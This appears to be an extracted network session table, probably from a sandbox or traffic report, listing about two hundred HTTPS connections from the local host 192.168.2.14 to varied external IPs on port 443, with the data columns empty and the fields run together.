                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16366192.168.2.144294267.127.10.87443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16367192.168.2.143926654.148.112.47443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16368192.168.2.1434550223.238.18.10443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16369192.168.2.1456808199.167.7.245443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16370192.168.2.143782641.191.247.163443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16371192.168.2.1456182172.147.108.199443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16372192.168.2.1438266165.50.52.29443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16373192.168.2.1448914203.225.88.130443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16374192.168.2.1458354142.69.122.118443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16375192.168.2.1455956117.88.68.211443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16376192.168.2.143512853.142.127.153443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16377192.168.2.143946414.95.181.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16378192.168.2.1440834189.253.125.41443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16379192.168.2.145142841.70.137.239443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16380192.168.2.1436984171.255.112.170443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16381192.168.2.1446642221.118.154.183443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16382192.168.2.145510881.31.220.120443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16383192.168.2.1446214123.212.237.206443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16384192.168.2.1441286174.82.19.243443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16385192.168.2.143497240.55.149.124443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16386192.168.2.1442356218.139.155.51443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16387192.168.2.14396501.80.187.199443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16388192.168.2.1460354163.92.141.123443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16389192.168.2.144235497.136.193.24443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16390192.168.2.1442508153.103.156.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16391192.168.2.145373045.238.131.112443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16392192.168.2.1458716119.205.70.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16393192.168.2.144037059.131.114.111443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16394192.168.2.144026687.45.4.78443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16395192.168.2.1444832213.251.195.30443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16396192.168.2.145678280.194.93.151443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16397192.168.2.1447330121.48.221.96443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16398192.168.2.144514283.75.249.247443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16399192.168.2.144670027.116.183.116443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16400192.168.2.1459104200.68.137.71443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16401192.168.2.1437930153.154.48.195443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16402192.168.2.1451382180.151.215.59443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16403192.168.2.1436528101.87.168.195443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16404192.168.2.1451182139.151.239.19443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16405192.168.2.1446458107.108.197.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16406192.168.2.1456476119.190.189.230443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16407192.168.2.1444720135.61.215.244443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16408192.168.2.1449164205.87.11.127443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16409192.168.2.145307012.188.223.107443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16410192.168.2.1460728216.226.109.179443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16411192.168.2.1449224142.236.171.218443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16412192.168.2.145956269.140.101.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16413192.168.2.143599690.134.114.243443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16414192.168.2.144243265.83.28.232443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16415192.168.2.1457290157.113.147.151443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16416192.168.2.1438660140.61.168.57443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16417192.168.2.1437070223.67.181.86443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16418192.168.2.1450948145.53.74.187443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16419192.168.2.1442496133.202.47.122443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16420192.168.2.144669443.87.42.192443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16421192.168.2.1450928132.185.206.45443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16422192.168.2.1435032211.250.230.173443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16423192.168.2.14545848.16.191.9443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16424192.168.2.1445670171.138.63.36443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16425192.168.2.1453238161.35.76.253443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16426192.168.2.144186491.208.77.145443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16427192.168.2.145975289.153.30.169443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16428192.168.2.1440440117.213.174.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16429192.168.2.1452454116.251.242.201443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16430192.168.2.1437520106.82.34.46443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16431192.168.2.1453960200.133.56.20443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16432192.168.2.1442396118.43.136.86443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16433192.168.2.144060212.113.133.169443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16434192.168.2.145600866.197.87.85443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16435192.168.2.1458472202.222.168.215443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16436192.168.2.1440512152.252.222.68443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16437192.168.2.1435190113.75.27.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16438192.168.2.1452678114.152.65.56443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16439192.168.2.14512044.135.199.79443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16440192.168.2.1448514200.171.131.224443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16441192.168.2.1449226116.235.86.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16442192.168.2.1437736184.4.181.138443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16443192.168.2.144621840.81.206.149443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16444192.168.2.1443978193.169.122.83443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16445192.168.2.143969289.9.135.47443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16446192.168.2.144593283.131.133.210443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16447192.168.2.1459676208.207.122.84443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16448192.168.2.1435112223.246.116.118443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16449192.168.2.1459982124.245.57.46443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16450192.168.2.1440476213.205.81.55443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16451192.168.2.144251673.223.244.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16452192.168.2.1442860142.195.108.26443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16453192.168.2.1435996185.201.222.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16454192.168.2.145678837.0.220.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16455192.168.2.1442654133.110.94.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16456192.168.2.1450020198.3.163.97443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16457192.168.2.1452772148.253.94.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16458192.168.2.1449670207.251.225.63443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16459192.168.2.144322685.113.185.10443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16460192.168.2.144291481.152.186.0443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16461192.168.2.1445762160.162.197.193443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16462192.168.2.146089280.7.201.64443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16463192.168.2.1451100164.240.47.31443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16464192.168.2.1452966170.219.79.214443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16465192.168.2.143946034.36.130.228443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16466192.168.2.1458706147.158.64.87443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16467192.168.2.1447404158.174.17.93443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16468192.168.2.1454438112.42.123.242443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16469192.168.2.1458614192.222.233.193443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16470192.168.2.1455214104.21.201.150443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16471192.168.2.1453314203.48.112.52443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16472192.168.2.144497865.67.208.26443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16473192.168.2.145220639.124.204.124443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16474192.168.2.14495902.65.235.59443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16475192.168.2.1444002132.12.199.80443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16476192.168.2.1441664173.130.61.175443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16477192.168.2.1433488160.34.189.106443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16478192.168.2.144067074.154.128.62443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16479192.168.2.145507432.141.231.77443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16480192.168.2.14383749.149.225.21443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16481192.168.2.1439354181.203.90.232443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16482192.168.2.146028663.151.144.73443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16483192.168.2.144412062.116.159.242443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16484192.168.2.1453056138.36.117.221443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16485192.168.2.1442522125.89.124.94443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16486192.168.2.144903045.208.10.160443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16487192.168.2.145286267.231.248.37443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16488192.168.2.1435918105.141.64.116443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16489192.168.2.1459528182.187.8.62443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16490192.168.2.145780098.61.34.68443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16491192.168.2.1449232132.216.96.1443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16492192.168.2.144809665.35.143.201443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16493192.168.2.144390248.35.245.222443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16494192.168.2.1445130135.192.247.188443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16495192.168.2.144154443.154.117.162443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16496192.168.2.1448124180.145.77.13443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16497192.168.2.1440260178.238.67.120443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16498192.168.2.145748697.125.223.52443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16499192.168.2.145366853.162.255.22443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16500192.168.2.1444882177.70.246.194443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16501192.168.2.1444896156.128.187.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16502192.168.2.1443090205.85.160.207443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16503192.168.2.144966846.93.213.206443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16504192.168.2.145791671.9.172.249443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16505192.168.2.1435904184.126.110.186443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16506192.168.2.143428082.180.63.212443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16507192.168.2.1432892169.232.229.40443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16508192.168.2.145313024.179.181.199443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16509192.168.2.1448344104.159.96.37443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16510192.168.2.1456538162.35.167.160443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16511192.168.2.1437670135.214.113.220443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16512192.168.2.1457290124.78.198.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16513192.168.2.1458050223.130.133.46443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16514192.168.2.1456288217.176.122.214443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16515192.168.2.1442128105.68.106.73443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16516192.168.2.1443206145.153.120.196443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16517192.168.2.1440522169.202.186.17443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16518192.168.2.145897612.103.167.215443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16519192.168.2.1452294136.90.109.148443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16520192.168.2.144765242.81.174.42443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16521192.168.2.1453350163.190.74.18443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16522192.168.2.1460934192.161.94.143443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16523192.168.2.1441378195.115.172.205443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16524192.168.2.143882268.233.103.144443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16525192.168.2.1445556208.213.202.163443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16526192.168.2.1443842216.56.200.112443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16527192.168.2.143716691.59.83.239443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16528192.168.2.1456990106.145.161.21443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16529192.168.2.144667483.60.46.239443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16530192.168.2.1447730130.131.104.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16531192.168.2.145218890.165.59.6443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16532192.168.2.1452150210.254.26.65443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16533192.168.2.1442958164.176.198.127443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16534192.168.2.14398289.3.117.138443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16535192.168.2.143362462.62.10.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16536192.168.2.1432898123.155.217.142443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16537192.168.2.144632862.121.196.179443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16538192.168.2.1460536203.11.8.124443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16539192.168.2.1441978223.202.41.207443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16540192.168.2.1446022219.149.74.234443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16541192.168.2.143471012.105.54.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16542192.168.2.1441426116.12.150.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16543192.168.2.144977690.164.201.35443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16544192.168.2.1454710107.33.218.37443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16545192.168.2.143361238.180.41.85443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16546192.168.2.1454488216.176.80.191443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16547192.168.2.1437054132.202.128.126443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16548192.168.2.1453476202.220.82.230443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16549192.168.2.1450826121.92.106.166443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16550192.168.2.143634647.102.186.187443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16551192.168.2.1450372194.30.108.59443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16552192.168.2.1446620211.127.66.234443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16553192.168.2.1444604192.20.119.206443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16554192.168.2.1442532207.86.226.158443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16555192.168.2.1443022137.247.99.201443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16556192.168.2.1458824131.101.8.29443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16557192.168.2.144896880.86.3.246443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16558192.168.2.1442366209.253.10.82443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16559192.168.2.144030442.239.84.207443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16560192.168.2.14355282.130.177.135443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16561192.168.2.145564459.4.84.9443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16562192.168.2.1447632190.50.109.28443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16563192.168.2.14572268.44.157.132443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16564192.168.2.145291289.55.138.212443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16565192.168.2.1440392167.98.34.112443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16566192.168.2.145245041.40.134.173443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16567192.168.2.1449004193.71.20.46443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16568192.168.2.1442646131.226.157.220443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16569192.168.2.144462066.61.89.2443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16570192.168.2.1437008187.28.9.17443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16571192.168.2.145998895.241.239.163443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16572192.168.2.1454488120.59.238.55443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16573192.168.2.1451704158.218.235.229443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16574192.168.2.144611465.80.59.5443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16575192.168.2.1449962123.245.191.173443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16576192.168.2.1449752165.237.191.217443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16577192.168.2.144315470.245.238.152443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
